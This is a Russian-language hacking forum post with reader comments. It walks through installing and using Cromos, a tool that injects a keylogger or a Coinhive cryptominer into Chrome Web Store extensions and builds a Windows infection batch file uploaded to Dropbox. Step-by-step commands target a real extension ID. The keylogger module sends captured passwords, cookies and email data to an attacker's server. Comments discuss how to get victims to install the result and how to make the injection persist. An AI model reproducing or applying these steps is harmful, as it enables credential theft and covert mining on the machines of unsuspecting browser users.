И снова здравствуйте! Данный материал будет посвящен инструменту, позволяющему вносить изменения в расширения для браузера, наделяя их недокументированными возможностями.

https://forum.antichat.xyz/attachmen...36e93965bb.png

Cromos - это инструмент для загрузки расширений из интернет-магазина Chrome и инъекции в них своего кода. Есть возможность создания собственных исполняемых файлов и функция размещения файлов в Dropbox.

Функционал:

· Загрузка расширения

· Инъекция кода

· Загрузка файлов в Dropbox

· Заражение ОС семейства Windows

Установка:

> git clone https://github.com/fbctf/cromos

> cd /cromos

> pip install –r requirements.txt

> python setup.py
https://forum.antichat.xyz/attachmen...72643ac47b.png

Справка:

> ./cromos.py –h

https://forum.antichat.xyz/attachmen...900e581034.png

Использование:

· Скачиваем подходящее расширение из маркета, предварительно узнав его ID.

> python cromos.py --extension oijdcdmnjjgnnhgljmhkjlablaejfeeb

Я использовал QR code scanner.

https://forum.antichat.xyz/attachmen...8536b0e57e.png

· Скачиваем нужное расширение и дополняем его установкой модуля keylogger.

> python cromos.py --extension oijdcdmnjjgnnhgljmhkjlablaejfeeb --load keylogger

https://forum.antichat.xyz/attachmen...cd207953fb.png


Подходящего сервера для требований кейлоггера, у меня сейчас нет, так, что проверить его работу не смогу. Надеюсь, кто-то в комментариях протестирует и отпишется.

Модифицированное расширение, можно найти здесь:

https://forum.antichat.xyz/attachmen...fcd07f4b16.png

Создание пакетного файла и загрузка его в Dropbox:

> python cromos.py --extension {id} --build {bat} --token {dropboxToken}

Модули:

· modules/keylogger - Этот модуль фиксирует все пароли, которые вы вводите в зараженном браузере через https или нет. Все, что вам нужно, это иметь, например php-сервер, для получения: данных электронной почты, пароли, файлы cookie и userAgent.

· modules/currency – Модуль майнинга криптовалют. Необходима учетная запись – coinhive.

Небольшой ролик, по использованию инструмента от разработчиков:

> https://asciinema.org/a/ENrke3a5kU83jC3hXIDdgWWyd?autoplay=1

На этом можно завершить. Спасибо за уделенное внимание.

Кто-то настраивал на майнинг?) Знает какие параметры указывать?

а юзверям его пропихивать как ? скидивать на страничку с запросом на установку модуля/плагина ?

Загляни в исходник модуля

Майнинг настраивал. Кого интересует вопрос на данную тему пишите конкретные вопросы. Тулза на самом деле очень простая, в принципе тоже самое делается и без нее ручками, просто дает чуть чуть автоматизации. Но не забываем про подписаные расширения, поэтому инжект будет лишь на 1 сессию так как запуск инжекта идет через chrome.exe --load-extension, а это запуск девелоперской версии хрома. После закрытия которой юзер будет запускать только юзерскую версию. Если хочется прописать юзеру постоянную работу через дев версию - нужно чутка включить голову, вариантов множество.
[doublepost=1510737349,1510737230][/doublepost]Да и маленький моментик для ТСа - стоило описать не много про токен боксы, а так же настройку выгрузки по токену в скриптах.

Кейлогер по дефолту отправляет все на www.heroku.com ))

Полезная статья, под лису есть что-то подобное?